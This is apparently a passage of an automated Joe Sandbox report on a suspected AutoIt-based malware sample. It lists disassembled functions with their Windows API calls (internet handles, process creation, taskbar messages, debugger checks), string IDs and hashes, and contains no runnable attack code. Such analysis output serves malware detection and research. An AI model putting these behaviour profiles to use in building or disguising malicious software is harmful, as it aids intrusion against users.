                                              • Instruction Fuzzy Hash: 081129B2610209AFDF00DFB8CC45AEA7BB8EB08314F145A15F955E2290E735E8959B60
                                              Function 00DECD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00DECD7D
                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00DECDA6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Internet$OpenOption
                                              • String ID: <local>
                                              • API String ID: 942729171-4266983199
                                              • Opcode ID: 55d58c4fbd328036617b76c9014e684a41606e956a6c7b7cc3f8b0cc03ee5327
                                              • Instruction ID: 9b91f4ff0f58906f346d4be07591bfbccc6cc6290a7aaa8d4dd0bfb9044a090f
                                              • Opcode Fuzzy Hash: 55d58c4fbd328036617b76c9014e684a41606e956a6c7b7cc3f8b0cc03ee5327
                                              • Instruction Fuzzy Hash: E4110271221671BAD7386B678C48EE7BEACEF127A4F00522AB14993080D3729846D6F0
                                              Function 00E03429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowTextLengthW.USER32(00000000), ref: 00E034AB
                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00E034BA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LengthMessageSendTextWindow
                                              • String ID: edit
                                              • API String ID: 2978978980-2167791130
                                              • Opcode ID: 5a538c614e56beaf91eb4caffba2d8e11b4b90ec8d2146b8dd673cf393b9159b
                                              • Instruction ID: 9c81a88e5cbbae1076642f157b36daaae0f50ac362c0babe9285dc98e47d19bb
                                              • Opcode Fuzzy Hash: 5a538c614e56beaf91eb4caffba2d8e11b4b90ec8d2146b8dd673cf393b9159b
                                              • Instruction Fuzzy Hash: A9119D71100208AEEB114F74DC40AEA376EEB05378F606324F970AB1D0C771DCD19761
                                              Function 00DD6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • CharUpperBuffW.USER32(?,?,?), ref: 00DD6CB6
                                              • _wcslen.LIBCMT ref: 00DD6CC2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: STOP
                                              • API String ID: 1256254125-2411985666
                                              • Opcode ID: 15c41e205282cd2ad5af97be1f60f05cd0ece13cb2c0682e70c5d549d975896a
                                              • Instruction ID: 29994c620e8db534945fb38317513b552fa8062356bae3aa4769fa31c82e573e
                                              • Opcode Fuzzy Hash: 15c41e205282cd2ad5af97be1f60f05cd0ece13cb2c0682e70c5d549d975896a
                                              • Instruction Fuzzy Hash: 880104326105268ACB209FFDDC818BF7BA5EB60710714052AE85292291FB31D844C6B0
                                              Function 00DD1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00DD1D4C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: e818b595b041bddfa48853671fd73a5393c50f20104940a2d7aca8b7bff4e686
                                              • Instruction ID: 40e8b2922a5bea426f9f2995adcc9268b84b5ba58141f61534c320571aca0693
                                              • Opcode Fuzzy Hash: e818b595b041bddfa48853671fd73a5393c50f20104940a2d7aca8b7bff4e686
                                              • Instruction Fuzzy Hash: 44012876600228BBCB14EBA4CC15CFEB769EB12350F04060AF866673C1EB315908C671
                                              Function 00DD1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00DD1C46
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: 73d4be9dc9c06ad78554c204d038fa3c8d292d6a1af9ecef4eeb6e8ea1388064
                                              • Instruction ID: 086fcc1366a06323f11192d0bae786740514247f250e9a2d4a8c3a69fdf39dff
                                              • Opcode Fuzzy Hash: 73d4be9dc9c06ad78554c204d038fa3c8d292d6a1af9ecef4eeb6e8ea1388064
                                              • Instruction Fuzzy Hash: F501A7767912047ADF14EB94CD66DFFF7A8DB11340F14001AA40677382EA219E18C6B2
                                              Function 00DD1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DD3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00DD3CCA
                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00DD1CC8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassMessageNameSend_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 624084870-1403004172
                                              • Opcode ID: 263b67eb5f1f195fe5b5864011bb08a8c860356f4048781db309107c474233a0
                                              • Instruction ID: e8685af1f1db4577c3a0f85ae6b2211380438cf9810ea8428d2ae1b7b4b04aac
                                              • Opcode Fuzzy Hash: 263b67eb5f1f195fe5b5864011bb08a8c860356f4048781db309107c474233a0
                                              • Instruction Fuzzy Hash: 090162B679121876CB15EBA9CE16EFEF7A8DB11340F140016B84673381EA619F18C672
                                              Function 00E08172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00E43018,00E4305C), ref: 00E081BF
                                              • CloseHandle.KERNEL32 ref: 00E081D1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: \0
                                              • API String ID: 3712363035-3218720685
                                              • Opcode ID: e8b2efecc81ea3318603382e71b709191b52ddd32d22564ab099ad559130157b
                                              • Instruction ID: 6cf119c8408ef343723706a4e5d8dbcf0d8eb58602db3b6a497e1afc669b8f7e
                                              • Opcode Fuzzy Hash: e8b2efecc81ea3318603382e71b709191b52ddd32d22564ab099ad559130157b
                                              • Instruction Fuzzy Hash: 4BF0E2B5640300BEE7206732AC06FB73A8CDB05750F000120BB48F50E2D67A9E4983F8
                                              Function 00DF747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: 3, 3, 16, 1
                                              • API String ID: 176396367-3042988571
                                              • Opcode ID: 9f6c06b12c1c4a55d6c6ff0d543e7cc583e06a4c6a18aad06d4ac50e3e7f2f3a
                                              • Instruction ID: 534b08408fee2e8246e4af8865f445d630ad6c0190d592b8455a178b6a8f13c1
                                              • Opcode Fuzzy Hash: 9f6c06b12c1c4a55d6c6ff0d543e7cc583e06a4c6a18aad06d4ac50e3e7f2f3a
                                              • Instruction Fuzzy Hash: 1EE02B022043242093312279DCC1DBF5689CFC9760715182FFA85C2267EA948D9293B0
                                              Function 00DD0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00DD0B23
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Message
                                              • String ID: AutoIt$Error allocating memory.
                                              • API String ID: 2030045667-4017498283
                                              • Opcode ID: 107bb832b2e7e23358332076acc678d8f1c997ceeae4df3282db84ec1770ddd0
                                              • Instruction ID: 0b764c7cdc013b66164dc2770d61210018b4f099057df07dd100373f4d47a498
                                              • Opcode Fuzzy Hash: 107bb832b2e7e23358332076acc678d8f1c997ceeae4df3282db84ec1770ddd0
                                              • Instruction Fuzzy Hash: 2BE0D8322443087AD21437947C07F897BC4CF05B51F20042BF758655C38AD264D046B9
                                              Function 00D90D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D8F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(00E40A88,00000000,00E40A74,00D90D71,?,?,?,00D7100A), ref: 00D8F7CE
                                              • IsDebuggerPresent.KERNEL32(?,?,?,00D7100A), ref: 00D90D75
                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00D7100A), ref: 00D90D84
                                              Strings
                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00D90D7F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                              • API String ID: 55579361-631824599
                                              • Opcode ID: 1560b5a7b36c1ce4170a3d957b4d2336d0bf91828e6ee74efdafea95e14d02cd
                                              • Instruction ID: 5dd0b1053168bf56497e734ee002bfe9639ce1803f27b636662bec6e9f9aaea7
                                              • Opcode Fuzzy Hash: 1560b5a7b36c1ce4170a3d957b4d2336d0bf91828e6ee74efdafea95e14d02cd
                                              • Instruction Fuzzy Hash: F1E065742007018FD7309F79E4043427FE4EB00750F04892DE496D6A91DBB1E4898BB1
                                              Function 00D8E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                              Download Yara Rule
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00D8E3D5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: 0%$8%
                                              • API String ID: 1385522511-2949748613
                                              • Opcode ID: 66841c83c2e57634ff0a4ae0d5349db8077c65e7665815435cd85d381d71ecba
                                              • Instruction ID: 384068ac53571d49be831842b535d0d3ec2fb1571dc3158a05ec1e453368c223
                                              • Opcode Fuzzy Hash: 66841c83c2e57634ff0a4ae0d5349db8077c65e7665815435cd85d381d71ecba
                                              • Instruction Fuzzy Hash: 55E02635500A10CFCB04B719B855A883351EB4A321B90916DF302A71D19B382C428B7A
                                              Function 00DCD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: %.3d$X64
                                              • API String ID: 481472006-1077770165
                                              • Opcode ID: 00d67c6c8c505af702d809f9f4e9b016fa41b32af963e1267bcb2dc6023991c2
                                              • Instruction ID: 3ecca3887c7d179a5d4abff43021f6acb2676cbccbad1133db3434e9889029b0
                                              • Opcode Fuzzy Hash: 00d67c6c8c505af702d809f9f4e9b016fa41b32af963e1267bcb2dc6023991c2
                                              • Instruction Fuzzy Hash: 49D012A1C0810AE9CB50A7D0CC49EBAF3BDEB09301F608476F886A3040E634D549AB75
                                              Function 00E02356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0236C
                                              • PostMessageW.USER32(00000000), ref: 00E02373
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: 71be0cf9695f99dd47e54d42c614fe840bb4c741e1fd9c6d76b271035b1eb5c1
                                              • Instruction ID: 4d3af081fbd4a065aa25be749f960d1a4cac803fac925dd38725a8d0e58d89db
                                              • Opcode Fuzzy Hash: 71be0cf9695f99dd47e54d42c614fe840bb4c741e1fd9c6d76b271035b1eb5c1
                                              • Instruction Fuzzy Hash: B8D0C9763813107BE668B771AC0FFC66A189B04B14F604A167645BA1E4C9A1A845CA65
                                              Function 00E02322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E0232C
                                              • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E0233F
                                                • Part of subcall function 00DDE97B: Sleep.KERNEL32 ref: 00DDE9F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: FindMessagePostSleepWindow
                                              • String ID: Shell_TrayWnd
                                              • API String ID: 529655941-2988720461
                                              • Opcode ID: f80b732f3ec69178357246cf51e18d30ae6254faa979d7bb702fe7fc26d13c50
                                              • Instruction ID: c368c966bc8c0d78c41e3197aad27dde8fc74cf122dea82e7fcf81036efbf9bc
                                              • Opcode Fuzzy Hash: f80b732f3ec69178357246cf51e18d30ae6254faa979d7bb702fe7fc26d13c50
                                              • Instruction Fuzzy Hash: C4D01276395310BBE678B771EC1FFC67A18DB00B14F204A177745BA1E4C9F1A845CA64